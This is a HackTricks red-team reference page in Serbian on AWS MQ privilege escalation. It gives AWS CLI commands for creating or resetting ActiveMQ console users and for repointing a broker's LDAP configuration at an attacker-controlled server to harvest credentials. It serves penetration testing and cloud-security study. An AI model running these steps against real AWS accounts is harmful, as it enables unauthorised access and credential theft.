AWS - MQ Privesc

Reading time: 3 minutes

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

MQ

Za više informacija o MQ proverite:

AWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Sa tim dozvolama možete napraviti novog korisnika u ActimeMQ brokeru (ovo ne funkcioniše u RabbitMQ):

bash
aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Potencijalni uticaj: Pristup osetljivim informacijama navigacijom kroz ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Sa tim dozvolama možete napraviti novog korisnika u ActiveMQ brokeru (ovo ne funkcioniše u RabbitMQ):

bash
aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Potencijalni uticaj: Pristup osetljivim informacijama navigirajući kroz ActiveMQ

mq:ListBrokers, mq:UpdateBroker

Ako broker koristi LDAP za autorizaciju sa ActiveMQ. Moguće je promeniti konfiguraciju LDAP servera koji se koristi na onaj koji kontroliše napadač. Na ovaj način napadač će moći da ukrade sve kredencijale koji se šalju putem LDAP.

bash
aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Ako biste nekako mogli pronaći originalne akreditive korišćene od strane ActiveMQ, mogli biste izvesti MitM, ukrasti akreditive, koristiti ih na originalnom serveru i poslati odgovor (možda samo ponovo koristeći ukradene akreditive mogli biste to uraditi).

Potencijalni uticaj: Ukrasti ActiveMQ akreditive

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks